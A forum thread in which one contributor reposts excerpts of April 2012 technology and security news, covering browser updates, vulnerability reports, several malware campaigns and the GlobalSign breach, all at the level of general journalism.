I get complaints almost every day from people who have been locked out of their Hotmail accounts. Nine times out of 10 they've been careless with the password -- re-using their Hotmail password on other sites, for example, or typing it on a machine of dubious pedigree. Some scammer grabs the password, logs on to Hotmail, and commandeers the account. Within minutes, every address in the Hotmail contact list receives a message that says, "Help I've been mugged, send $500 via Western Union." Invariably the scammers change the password, so they can use the account while the owner's wondering why he or she can't get in.

I'm sure you can see the problem. Hotmail accounts are quite attractive to scammers. If you use a Hotmail ID for your Microsoft Account and your Hotmail account gets hijacked and the password changed, all of a sudden you can't log on to your own PC.

The solution is to create a Password Reset "disk" (which isn't a disk at all but a simple text file) while you still have control of your PC. The Password Reset disk won't get you back into your Hotmail account, but at least it'll pry open the gates to your PC.

http://www.infoworld.com/t/microsoft-windows/the-h...

--
Was this reply relevant?
+0
-0
mogs CClip 56
Expert Contributor 18th Apr, 2012 21:39
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Microsoft remains mum on Windows 8 upgrades from Vista, XP
Limits upgrade path confirmation to 2009's Windows 7

By Gregg Keizer
April 18, 2012 02:35 PM ET
Computerworld - Microsoft today declined to confirm whether users of Windows XP and Vista will be able to upgrade their PCs to Windows 8 when the latter launches later this year.

On Monday, Microsoft spelled out the editions it would offer customers working with 32- and 64-bit Intel and AMD processor-powered PCs and tablets.

In that blog post, the company also noted the upgrade paths to Windows 8 for existing machines, saying that people now running Windows 7 Starter, Home Basic or Home Premium could upgrade to the consumer-oriented Windows 8. Systems running Windows 7 Professional or Ultimate will be upgradable to Windows 8 Pro.

Although Microsoft did not specify the upgrade path for customers currently running Windows 7 Enterprise, the assumption is that they will be able to upgrade to Windows 8 Enterprise, which, like its predecessor, will be distributed only to companies with Software Assurance upgrade agreements.

The omission of the problem-plagued Vista and the nearly 11-year-old XP from Microsoft's explicit upgrade path seemed odd: In February, the company used an FAQ to plainly state that users of those OSes could upgrade to Windows 8's beta, tagged "Consumer Preview."

Read more at :-
http://www.computerworld.com/s/article/9226333/Mic...

--
Was this reply relevant?
+0
-0
mogs CClip 57
Expert Contributor 19th Apr, 2012 22:03
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
HP Report: More Attacks, Despite Fewer New Vulnerabilities Overall

Attackers are taking advantage of high-severity and unpatched vulnerabilities, according to HP's Top Cyber Security Risks Report.

By Sean Michael Kerner | April 19, 2012 Share

For years, security vendors have been in an arms race with hackers. As the rate of discovery of new vulnerabilities continued to grow, attackers have enjoyed an ever-expanding menu of security flaws to exploit. But last year, something happened: The number of new vulnerability reports actually declined.

According to HP's new Top Cyber Security Risks Report for 2011, there was a 19.5 percent decrease in the number of new publicly reported vulnerabilities over the course of last year.

But don't start celebrating just yet, because attack volume still continues to increase. Attack data from HP TippingPoint shows approximately 475 million attacks in 2010 vs. 531 million in 2011 -- an 11 percent increase.

So while the number of publicly reported vulnerabilities is down, the overall security risks have not actually declined. That's according to Jennifer Lake, security product marketing manager at HP DVLabs, who told eSecurity Planet that a deeper analysis of the new vulnerabilities that were disclosed in 2011 shows that the proportion of high-severity vulnerabilities has actually increased. In 2011, high-severity vulnerabilities (those with a CVSS score of between 8 and 10) jumped by 24 percent. CVSS (Common Vulnerability Scoring System) vulnerabilities with an 8 to 10 score are items that are exploitable remotely and represent high immediate risk.

HP also found that many attackers are also still going after old (unpatched) vulnerabilities. Many attackers are now using exploit toolkits such as Blackhole which are packaged to include known vulnerabilities. That's another reason why there isn't as much of a need for attackers to find new vulnerabilities, because the old ones are still effective against so many systems.

Read more at :-
http://www.esecurityplanet.com/network-security/hp...

--
Was this reply relevant?
+0
-0
mogs CClip 58
Expert Contributor 19th Apr, 2012 22:10
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 19th Apr, 2012 22:12
Chrome Updates
Beta Channel Update

Wednesday, April 18, 2012 | 16:50
Labels: Beta updates
The Beta channel has been updated to 19.0.1084.30 for Windows, Mac, Linux, and Chrome Frame.

Take a look at the changelog to see what happened in this release, we've update the localization and fixed a number of stability issues.

If you'd like to get on the Beta channel, you can download it from our Beta download page. If you find a new issue, please let us know by filing a bug.

Anthony Laforge
Google Chrome
7 comments | Links to this post | Email Post

Dev Channel Update
Tuesday, April 17, 2012 | 17:30
Labels: Dev updates
UPDATE: Windows and Chrome Frame has been updated to 20.0.1105.2. It contains a fix for stability crash.


The Dev channel has been updated to 20.0.1105.0 for Windows, Mac, Linux and Chrome Frame. This build contains following updates:

All
Updated V8 - 3.10.2.1
Fixed issues - 121584, 122130, 122850, 123403
Fixed empty apps page crash. (Issue: 122214)

Windows
Fixed a crash in the Cloud Print connector when connecting via Remote Desktop (Issue: 122996)
Fixed incorrect program icon being shown in the task switcher. (Issue: 118368)
Fixed downloads page drag/drop. (Issue: 122946)

Known Issues
[Mac 10.6] Video isn’t displayed when entered into presentation mode (pressing cmd + shift + f) (Issue: 123911)

Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome

--
Was this reply relevant?
+0
-0
mogs CClip 59
Expert Contributor 19th Apr, 2012 22:17
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Security firm Trend Micro says Apple topped its list of companies hit with vulnerabilities followed by Oracle and Google

By John P. Mello Jr.
Apple led all major technology vendors in reported vulnerabilities in its operating system and software during the first three months of 2012, according to a report released Tuesday by Trend Micro.

Apple reported 91 vulnerabilities during the period, making it number one among the top 10 technology vendors in the industry, said the report, "Security in the age of Mobility." [PDF]

Trailing Apple were Oracle (78 vulnerabilities), Google (73), Microsoft (43), IBM (42), Cisco (36), Mozilla (30), MySQL (28), Adobe (27), and Apache (24).

In addition, Trend Micro reported that Apple issued a record number of patches to its Safari browser in March during the period. A year earlier, March was also a mammoth month for patches, with Apple addressing 93 vulnerabilities, a third of them characterized as "critical," in its Leopard and Snow Leopard operating system.

More at :-
http://www.infoworld.com/d/security/report-apple-o...

--
Was this reply relevant?
+0
-0
mogs CClip 60
Expert Contributor 19th Apr, 2012 22:24
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Two-thirds of UK web cookies owned by third parties
Most websites in the UK are tracking your every move

By Sophie Curtis | Techworld | 19 April 12
UK websites contain an average of 14 cookies per page, the majority of which belong to third parties, according to a new report.

Cookies are small sections of code that websites put on a user's computer so that they can remember something. They are used to enable websites to remember users' preferences, but can also be used to track consumers' browsing behaviour for targeted advertising purposes.

A typical user will encounter anywhere between 112 and 140 cookies during their average session on a British website, according to privacy solutions provider TRUSTe, and over two-thirds will be used by third parties (ie. not the website owner) to deliver targeted advertising.

The news comes just over a month before the EU e-Privacy Directive is enforced in the UK, requiring anyone running a website to get explicit opt-in consent from their visitors before deploying cookies on their machines. The law is designed to give people greater choice about whether or not they want their online behaviour to be tracked.

More at :-
http://www.pcadvisor.co.uk/news/security/3352412/t...

--
Was this reply relevant?
+0
-0
mogs CClip 61
Expert Contributor 20th Apr, 2012 22:03
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 20th Apr, 2012 22:04
April 20, 2012

Symantec: 'VeriSign Trusted' mark out, 'Norton Secured' in

New Symantec trust-mark branding means website has to have passed daily security scans

By Ellen Messmer | Network World

Symantec is phasing in a new trust mark to ensure Web users that the sites they are visiting are safe. Symantec has been replacing "VeriSign Trusted" with "Norton Secured, powered by VeriSign."

The old "VeriSign Trusted" mark (right) meant the website uses a VeriSign SSL certificate for authentication and also got a daily malware scan, which VeriSign added as a service associated with the mark in 2010 to boost its security significance. In August of that year, Symantec acquired this VeriSign identity and authentication business for more than $1 billion, and has been sorting out brand issues ever since. One result is the newly created "Norton Secured, powered by VeriSign" trust mark -- Norton, of course, is Symantec's consumer-oriented security brand.

More at :-
http://www.infoworld.com/d/security/symantec-veris...


--
Was this reply relevant?
+0
-0
mogs CClip 62
Expert Contributor 20th Apr, 2012 22:13
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 20th Apr, 2012 22:14

100 million users might be affected by a social network vulnerability

Problems reported to Ning network
By Dave Neal
Fri Apr 20 2012, 17:34
DO IT YOURSELF social networking company Ning is reportedly suffering from a slight security problem that could affect 100 million users.

Ning lets people set up their own gasbag social networking channels and is used by people like the pop group Radiohead. According to a Dutch report a problem with its security could leave them wide open to account hijackers.

A Dutch web site called Web Wereld says that two students, Angelo Geels and Alex Brouwer have exploited cookies to gain login control over Ning user accounts. They used a proof of concept that showed they could access 90,000 accounts and 100 million users, but had no intention of exploiting it for malicious purposes.

They did suggest that if others were able to use it then they could take over Ning accounts. "You can build an application that automates acquisition of an identity," said Geels in the report.

The students told Ning about the exploit last month and since then the firm has worked to fix it. This is not the first time that security students have worked with Ning, and last year students reported five vulnerabilities that included the threat of credit card theft.

http://www.theinquirer.net/inquirer/news/2169403/1...

--
Was this reply relevant?
+0
-0
mogs CClip 63
Expert Contributor 20th Apr, 2012 22:22
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Fake Steam Client Urges Users to Disable Antivirus

Advertised on YouTube as a Steam Cracker that allows users to play “all games for free,” the malicious element is actually part of a phishing scheme that targets game serial numbers.

Chris Boyd of GFI reveals that the YouTube page which promotes the shady app urges users to disable their antivirus applications and their firewalls because they falsely detect the program as being a threat.

Of course, this is a real threat, which apparently runs only on Windows Vista or newer versions of the operating system.

The fake Steam client’s installation process is legitimate-looking and real speampowered pages are included, to make everything appear more credible. There are even buttons that point to the genuine Playstation Network ID login page.

While on the surface everything seems legit, in the background, the phony application accesses the registries in an attempt to steal CD Keys.

More at :-
http://news.softpedia.com/news/Fake-Steam-Client-U...

--
Was this reply relevant?
+0
-0
mogs CClip 64
Expert Contributor 20th Apr, 2012 22:29
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

April 20th, 2012, 12:05 GMT · By Eduard Kovacs

Spy Trojan Served by Syrian Hackers as “Skype Encription”

We’ve seen numerous reports from security solutions firm regarding the campaigns that target Syrians. Trend Micro experts provide another example of a malicious plot, this time leveraging a so-called Skype Encription application.

Advertised as a product made by IT Security Lab to encrypt communications, in reality, Skype Encription hides the DarkComet RAT that’s been used in other similar schemes.

After analyzing the shady application, experts found that it may have been developed by SyRiAnHaCkErS.

So how does the plot work?

First, users are presented with the site from which Skype Encription can be downloaded. Once it finds itself on a computer, Skype Encription v 2.1.exe, identified as BKDR_METEO.HVN, connects to a server from which it downloads skype.exe, which is actually a backdoor called BKDR_ZAPCHAST.HVN.

This backdoor is the Remote Access Trojan known as DarkComet, which can allow the masterminds of the operation to take full control of the infected system.

Two important things must be mentioned. The shady Skype Encription program is not only a piece of malware, but it doesn’t offer any of the features it promises. Experts found that it does not encrypt communication in any way.

Furthermore, Skype uses AES encryption on audio, video and text communications, which means that users shouldn’t worry about encrypting messages with third party apps.

It’s clear that Syrians continue to be targeted and these threats will become more vicious. That is why Syrians, or anyone interested in particular pieces of software, should be wary before rushing to install programs.

Many applications, especially those that purport to come from the websites of important security solutions providers, are often found to hide malicious elements. That is why, the best thing users can do is download software only from the vendor itself or from trusted websites.

http://news.softpedia.com/news/Spy-Trojan-Served-b...






--
Was this reply relevant?
+0
-0
mogs CClip 65
Expert Contributor 20th Apr, 2012 22:33
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft Releases Antimalware Engine 1.1.8304.0
Just as announced several days back, Microsoft’s Antimalware Engine 1.1.8304.0 has been made available on April 18th, 2012.

Fresh out of the Redmond-based software giant’s laboratories, the new release was pushed to all of the company’s Microsoft Security Essentials customers.

Additionally, the new Antimalware Engine 1.1.8304.0 was delivered to all Forefront Client Security, Forefront Endpoint Protection, and Windows Intune Endpoint Protection customers.

“Signature package 1.125.0.0 is the first that contains this engine,” the software company also said on the new release.

The new engine iteration was made available as part of Microsoft’s traditional monthly updates for the technology and follows the Antimalware Engine 1.1.8202.0 that came out on March 20th.

The software was designed to enable increased reliability and security of various products and was meant to address the latest threats discovered out there.

http://news.softpedia.com/news/Microsoft-Releases-...

--
Was this reply relevant?
+0
-0
mogs CClip 66
Expert Contributor 21st Apr, 2012 17:14
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Top 5 WordPress Vulnerabilities and How to Fix Them

WordPress is a popular target for hackers, but there are steps you can take to make your installation more secure.

By Aaron Weiss | April 20,

Did you know that more than 73 million web sites in the world run on the WordPress publishing platform? This makes WordPress more popular than Microsoft SharePoint, Blogger, or Drupal. It also means that WordPress is a large target for hackers.

Half of the WordPress sites out there are self-hosted, which means that the WordPress administrator carries the lion's share of responsibility for a secure installation. Out of the box, there are several ways that WordPress security can be tightened down, but only a fraction of sites actually do so. This makes WordPress an even more popular target for hackers.

The following five strategies can help any WordPress installation become significantly more secure, and raise awareness of the types of vulnerabilities to defend against.

Read more at :-
http://www.esecurityplanet.com/open-source-securit...

--
Was this reply relevant?
+0
-0
mogs CClip 67
Expert Contributor 22nd Apr, 2012 21:16
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Experts Find Control Panel for Ransomlock Powered Ransomware Ransomware infections have become more popular among cybercriminals, and security researchers have come across another Trojan that fuels such campaigns. The novelty in this scenario is that the control panel that’s being utilized in the scheme has been found.

Identified by Symantec as Trojan.Ransomlock.K, the malicious element communicates with a command and control server from which it receives its orders.

The interface that allows the cybercrooks to communicate with their Trojan is called Silent Locker Control Panel and according to the experts, it is somewhat similar to other control panel used for pieces of malware such as ZeuS and SpyEye.

The Russian variant of the Silent Locker Control Panel found by experts offers a number of options. First of all, it tracks the infected computer’s location and date, information that can be used for billing.

Also based on the location, the cybercriminal can choose what picture the ransomware displays when it takes over a computer. For instance, if the victim resides in the UK, a picture of the Metropolitan Police can be used, the default image being the one shown in the screenshot.

If notifications that rely on the reputation of a law enforcement agency don’t work, the fraudsters can always turn to fake Windows Security Checks or other scams that may convince the victim that his/her device is being blocked for performing illegal activities, or even because of some phony system errors.

While in this case experts haven’t found a Trojan builder for Ransomlock.K, they believe that the kit most likely comes with one. Similar to SpyEye and ZeuS, most crimeware kits offer the complete package: Trojan, builder and control panel.

The bottom line is that no matter if you find your computer being held hostage by a law enforcement agency, or by a fake security solutions provider that urges you to purchase cleaning products, never ever pay the amount of money they demand.

http://news.softpedia.com/news/Experts-Find-Contro...


--
Was this reply relevant?
+0
-0
mogs CClip 68
Expert Contributor 22nd Apr, 2012 21:23
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Secfence: NASA Closed Security Holes, but XSS Flaws Still Present Experts from Secfence Technologies reveal that NASA has been working on patching some of the vulnerabilities present on its websites, but there are still a few on which the ever-present cross-site scripting (XSS) flaw can still be found.

Since its last report, when it admitted that there’s a lot of work to be done in the security sector, NASA has been working on securing its numerous public facing websites, but there’s still a lot to be done.

Security researchers from Secfence provided a couple of examples.

First, the PDS domain, the one that hosts The Planetary Data System, has been named as containing an XSS weakness that could be easily leveraged by ill-intended hackers.

“Once identified, malicious users can use this to perform various JavaScript- based attacks,” Prashant Uniyal, information security analyst at Secfence told us.

Many may be wondering why the screenshot provided by the experts actually displays the eBay site. That’s because the XSS vulnerability can allow cybercriminals to change the site’s appearance in any way they desire.

By convincing their potential victims to click on a cleverly designed link, the cybercrooks can replace the regular content with anything from malware serving sites to webpages that host phishing forms.

Imagine if instead of the eBay site, there would be a page that displays a form which requests the user to enter his/her passwords and other sensitive information.

Because of the URL displayed in the browser’s address bar, the victim believes that he/she is actually on the legitimate NASA site.

The second domain appointed as being vulnerable is the one of the Goddard Space Flight Center. In this scenario, the white portion of the webpage seen in the screenshot could also be altered to display arbitrary content. For the plot to be successful, some social engineering is required, but as we’ve seen on previous occasions, this is not a great impediment.

By making these flaws public, the experts hope to raise awareness and get NASA to rush the patching process.

http://news.softpedia.com/news/Secfence-NASA-Close...

--
Was this reply relevant?
+0
-0
mogs CClip 69
Expert Contributor 22nd Apr, 2012 21:27
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Latest Opera 12 Snapshot Switches to DirectX, Beta Is Around the Corner Opera 12 is closer than ever, the first beta is just around the corner Opera announced. It's not quite there yet so, for now, there's another snapshot for testing.

It's an important one though, the latest snapshot enables DirectX support on Windows, but it also comes with hardware acceleration disabled by default, a change that will persist with the final, stable release.

DirectX-backed hardware acceleration is not on par with the OpenGL-based alternative, Opera warns, but it is good enough for testing. Eventually, DirectX will be the prefered API on Windows since it's better supported than OpenGL.

Apart from these big changes, the latest snapshot comes with a long list of bug fixes and improvements, related to web camera support, out-of-process-plugins and many more. The full changelog is available in Opera's announcement.

http://news.softpedia.com/news/Latest-Opera-12-Sna...

--
Was this reply relevant?
+0
-0
mogs CClip 70
Expert Contributor 22nd Apr, 2012 21:32
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Mac OS X Is Vulnerable To Malware, Says Kaspersky

Written by
Radu Tyrsina
Radu has been working as a freelance writer for more than five years and has been blogging around since 2004. He is interested in anything Apple...

Myth buster!

The time when Mac users could show off their well-shielded machines and make fun of regular PC users, who faced one virus attack after another, is long gone.

After Apple announced back in 2011 that their beloved Macs reached 5 per cent of the desktop and laptop global market share, cyber criminals the world over turned this remark into a challenge.

Just a year ago, Mac OS X suffered aggressive malware attacks from FakeAv/Rogueware, resulting in Macs being exposed to certain weakness issues - with the platform displaying exploitable security loopholes.

"Safari, Quicktime, and other software on Apple devices is regularly exploited during pwnage contests, but widespread cybercrime attention hadn't caught on until this past year," points out Kurt Baumgartner, Kaspersky Lab expert.

The recent Flashback malware, or Flashfake (as presented by numerous variants as fake Flash updates requiring installation) has revealed this Mac OS X vulnerability.

There are specialised groups that target Macs and hijack traffic in order to earn ad revenue, such as Koobface - distributing malware capable of performing sophisticated banking crimes.

Read more: http://www.itproportal.com/2012/04/21/mac-os-x-is-...

--
Was this reply relevant?
+0
-0
mogs CClip 71
Expert Contributor 23rd Apr, 2012 20:28
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Firefox skirts Windows security feature to make silent updates happen
Firefox 12, set to release Tuesday, sidesteps Windows' UAC

By Gregg Keizer
April 23, 2012 12:56 PM ET
Computerworld - Mozilla will ship Firefox 12 tomorrow with a key component of its years-long silent update project.

Firefox 12, which got the green light from Mozilla last week, is slated to release on Tuesday, April 24.

Among the changes to Firefox 12, the most noticeable to Windows users will be the disappearance of the UAC, or "user account control," prompt on Vista and Windows 7 during updates.

UAC is a security feature introduced in Vista -- and in a less-intrusive form, tucked into Windows 7, too -- that requires users to agree to most program installations.

Firefox 12 will be the first edition from the open-source developer that sidesteps UAC

Read more at :-
http://www.computerworld.com/s/article/9226463/Fir...

--
Was this reply relevant?
+0
-0
mogs CClip 72
Expert Contributor 23rd Apr, 2012 20:38
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Researchers Develop Personal Firewall Solution for Pacemakers, Insulin Pumps

The MedMon device is intended to protect wireless medical devices from cyber attacks.

By Jeff Goldman

Purdue University and Princeton University researchers have developed a device, called MedMon, which is designed to protect wireless medical devices such as pacemakers and insulin pumps from hacking.

"The potential problem drew wide attention twice last year -- first when diabetic Jerome Radcliffe tweaked the dosage levels on his own pump at the Defcon hacking conference, prompting a call to action from federal lawmakers, then again when professional hacker Barnaby Jack of ATM-hacking fame showed how easy it is to deliver a lethal dose of insulin at the Hacker Halted security conference," writes CMIO's David Pearson.

"The prototype MedMon (medical monitor) device acts as a firewall that prevents hackers from interfering with these devices," writes mobihealthnews' Brian Dolan. "The team has demonstrated the system protecting a diabetes system that consists of a wireless-enabled glucose meter and insulin pump that communicate with each other via short range wireless."

"It's an additional device that you could wear, so you wouldn't need to change any of the existing implantable devices," Purdue professor of electrical and computer engineering Anand Raghunathan said in a statement. "This could be worn as a necklace, or it could be integrated into your cell phone, for example."

"It works, the researchers explain, through 'multi-layered anomaly detection,' where the software sets off an alarm if it detects a potential hacking effort or simply uses electronic jamming to block the hacking program from reaching the device," writes FierceMedicalDevices' Mark Hollmer.

The device is just a proof of concept at this point, and would need to be miniaturized in order to be practical. Still, the researchers have already filed a provisional patent application on the concept.

http://www.esecurityplanet.com/network-security/re...

--
Was this reply relevant?
+0
-0
mogs CClip 73
Expert Contributor 23rd Apr, 2012 20:47
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
FBI Steps Up 'Internet Doomsday' Awareness Malware Campaign
FBI says infected users must deal with DNS changer malware or risk losing Internet in July.

By Jared Newman | PC World | 23 April 12
PC users infected with a strain of malware called DNS Changer will face their own personal Internet doomsday in July unless they disinfect their computers, the FBI warns.

Users have until July 9 to rid themselves of the DNS Changer malware, which can infect Windows PCs and Macs alike. After that, the FBI will throw a switch that prevents infected computers from accessing the Internet.

It's not as Big Brother as it sounds. DNS Changer is a Trojan that surfaced in 2007 and infected millions of machines. The malware would redirect computers to hacker-created Websites, where cyber-criminals sold at least $14 million in advertisements. DNS Changer also prevented computers from updating or using anti-virus software, leaving them vulnerable to even more malicious software.

Last November, in one of the biggest cybersecurity takedowns ever, the FBI arrested six Estonian nationals that allegedly ran the clickjacking fraud, and seized the rogue DNS servers where infected users were being redirected. The FBI has put up surrogate servers in place of the malicious ones, but only temporarily.

Read more: http://www.pcadvisor.co.uk/news/security/3353186/f...

--
Was this reply relevant?
+0
-0
mogs CClip 74
Expert Contributor 23rd Apr, 2012 20:54
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Plumbers of the interwebs vow to kill IP hijacking

Task force to send 'Rover' out to wild web galaxy
By John Leyden

Posted in Hosting, 23rd April 2012 08:31 GMT
The Internet Engineering Task Force (IETF) aims to strengthen the basic protocols of the internet, with a way to stop route, or IP, hijacking. IETF experts say the proposed fix is simpler to implement than previous suggestions.

IP hijacking exploits a fundamental weakness of the internet, Data and messages sent across the internet are transmitted via routers, and those routers are blindly trusted. No measures are in place to verify if they have been tampered with to re-direct or intercept traffic.

In 2008, Pakistan Telecom took advantage of this blind trust to send YouTube briefly into a global blackhole. CNET's Declan McCullagh wrote at the time:

By accident or design, the company broadcast instructions worldwide claiming to be the legitimate destination for anyone trying to reach YouTube's range of Internet addresses.

The security weakness lies in why those false instructions, which took YouTube offline for two hours on Sunday, were believed by routers around the globe. That's because Hong Kong-based PCCW, which provides the Internet link to Pakistan Telecom, did not stop the misleading broadcast - which is what most large providers in the United States and Europe do.


More at :-
http://www.theregister.co.uk/2012/04/23/ip_hijack_...

--
Was this reply relevant?
+0
-0
mogs CClip 75
Expert Contributor 23rd Apr, 2012 20:58
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Security bug stalls new dot-word TLD land grab AGAIN

ICANN's domain explosion backfires, fizzles out
By Kevin Murphy

Posted in Hosting, 23rd April 2012 13:01 GMT
Domain name overlord ICANN has been forced to delay its new top-level domain (TLD) expansion by another week as its techies attempt to analyse the fallout of an embarrassing security vulnerability.

Its TLD Application System (TAS), which companies worldwide have been using since January to confidentially apply for gTLDs such as .gay, .london and .blog, has now been down for 10 days due to a bug that enabled some applicants to see information belonging to others.

While ICANN maintains that it has fixed the problem, it now says that it needs at least another week to sift through its mountains of TAS logs, in order to figure out which applicants' data was visible to which other applicants.

More at :-
http://www.theregister.co.uk/2012/04/23/security_b...

--
Was this reply relevant?
+0
-0
mogs CClip 76
Expert Contributor 24th Apr, 2012 08:32
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Google boosts Web bug bounties to $20,000
Increases payments for bugs in core sites, services and Web apps

By Gregg Keizer

Computerworld - Google today dramatically raised the bounties it pays independent researchers for reporting bugs in its core websites, services and online applications.

The search giant boosted the maximum reward from $3,133 to $20,000, and added a $10,000 payment to the program.

The Vulnerability Reward Program (VRP) will now pay $20,000 for vulnerabilities that allow remote code execution against google.com, youtube.com and other core domains, as well as what the company called "highly sensitive services" such as its search site, Google Wallet, Gmail and Google Play.

Remote code flaws found in Google's Web apps will also be rewarded $20,000.

More at :-
http://www.computerworld.com/s/article/9226476/Goo...

--
Was this reply relevant?
+0
-0
mogs CClip 77
Expert Contributor 24th Apr, 2012 08:37
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Stable Channel Update
| 11:26
Labels: Stable updates

The Chrome Stable channel has been updated to 18.0.1025.165 on Mac.


This release fixes a top crasher on the Mac. (Issue: 123589).


Interested in hopping on the stable channel? Find out how. If you find a new issue, please let us know by filing a bug.

Karen Grunberg
Google Chrome

--
Was this reply relevant?
+0
-0
mogs CClip 78
Expert Contributor 24th Apr, 2012 08:41
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Cyber arms race will be next step in computer warfare, says F-secure's Mikko Hypponen

Any future crisis between technically advanced nations will have cyber elements
By Lee Bell

SECURITY FIRM F-secure's chief security researcher, Mikko Hypponen has warned that we are entering into a cyber warfare revolution, and that governments will soon attempt to outdo each other based on their computer weapons' prowess.
The internet security expert said in an exclusive interview with The INQUIRER that any future crisis between technically advanced nations will involve cyber elements.
His comments came after hearing last week that China and the US have been engaging in "war games" simulations.
"I wasn't expecting [war games] so soon," Hypponen said.
"I'm surprised and I think it is a good move because everybody is worried about escalation. The way to fight unnecessary escalations is that you know more about how the perceived enemy would act if there would be an escalation. War games are exactly that."
It was Hypponen's observations on the war games which led him to remark that we must look at "the bigger picture".

More at :-
http://www.theinquirer.net/inquirer/news/2169722/c...

--
Was this reply relevant?
+0
-0
mogs CClip 79
Expert Contributor 24th Apr, 2012 21:21
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Norton Secured Seal: Symantec Combines VeriSign Checkmark with Norton Brand

Users who want to check if websites are trusted and secure shouldn’t look for the VeriSign Trust Seal anymore. Symantec decided to combine it with their Norton brand and thus resulted the Norton Secured Seal.

Ever since the security organization acquired VeriSign Authentication Services, anti-malware and security technologies have been integrated into authentication solutions.

“Since acquiring the VeriSign Authentication business, Symantec extends the core foundation of SSL to offer the most comprehensive security portfolio in the market,” revealed Fran Rosch, vice president, Identity and Authentication, Symantec.

“Our shift to delivering Website Security Solutions further strengthens the protection of data and information in transit. The Norton Secured Seal represents a major step in helping companies establish higher levels of website trust and confidence with their customers.”

An emblem that can guarantee a safe browsing experience is highly important in an age where the Internet is a place that should be treated as dangerous by default.

More at :-
http://news.softpedia.com/news/Norton-Secured-Seal...

--
Was this reply relevant?
+0
-0
mogs CClip 80
Expert Contributor 24th Apr, 2012 21:28
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Macs more likely to carry Windows malware than Mac malware, study finds
Seventy-five percent of Mac OS X infections involve a Flashback variant, Sophos finds

By Lucian Constantin | IDG News Service

One in five Mac computers is likely to carry Windows malware, but only one in 36 is likely to be infected with malware specifically designed for the Mac OS X, according to study performed by antivirus firm Sophos.

Sophos collected malware detection statistics from 100,000 Mac computers that run its free antivirus product and found that 20 percent of them contained one or more types of Windows malware.

[ Also on InfoWorld: Flashback returns: Is Apple dropping the ball? | Learn how to secure your systems with InfoWorld's Malware Deep Dive PDF special report and Security Central newsletter, both from InfoWorld. ]

When stored on a Mac, Windows malware is inactive and can't do any harm, unless that computer has Windows installed as a secondary OS.

However, such malicious files can still be transferred unknowingly by Mac users to Windows machines via file sharing, USB memory sticks, external hard disk drives and other removable media devices.

More at :-
http://www.infoworld.com/d/security/macs-more-like...

--
Was this reply relevant?
+0
-0
mogs CClip 81
Expert Contributor 25th Apr, 2012 21:24
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Risky websites to be named and shamed According to the 'Pulse' tool, the UK Direct.gov web portal, used by UK citizens for financial transactions such as renewing car tax discs, does not have valid certificates for its domain.

Pulse has been set by the Trustworthy Internet Movement (TIM), and allows the public to type in web addresses to find out whether the organisation has good SSL security. It also lists badly performing sites, in an effort to encourage the site owners to implement SSL properly, according to TIM-backer and Qualys chief executive Philippe Courtot.

It was frustrating to see how many sites did not have SSL properly implemented.

SSL and its successor TLS are widely used online to authenticate transactions between browsers and websites. Web browsers and servers use TLS to prevent eavesdropping or tampering with a communication. Taher Elgamal, a cryptographer credited with co-inventing TLS, told ZDNet UK on Wednesday that one of the dangers of websites not using SSL correctly is that the websites could be spoofed.

Read more at :-
http://www.zdnet.co.uk/blogs/security-bulletin-100...

--
Was this reply relevant?
+0
-0
mogs CClip 82
Expert Contributor 25th Apr, 2012 21:33
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
GlobalSign breach was down to unpatched system
By Tom Espiner , 25 April, 2012 17:20

A hacker managed to get into a GlobalSign server and compromise the company's digital certificate due to a piece of unpatched open source software on the server, according to a C-Level member of GlobalSign staff.

The code had not been updated as it was not included on lists of proprietary software to be patched, the senior GlobalSign staff member told ZDNet UK on Wednesday.

"There was an old version of a component that was unpatched," said the GlobalSign exec. "It was an open-source piece of code that was not included in versioning maintenance."

GlobalSign took the precaution of halting certificate issuance for nine days last September after hacktivist the 'Comodohacker' claimed to have breached the certificate authority's systems. The company tore down and rebuilt its systems after it found its external marketing server had been hacked.

An investigation by security company Fox-IT found that GlobalSign's company certificate had been compromised, potentially allowing an attacker to mimic the company's website. GlobalSign's root certificate, which allows the company to issue certificates that browsers trust to authenticate other websites, had not been compromised.

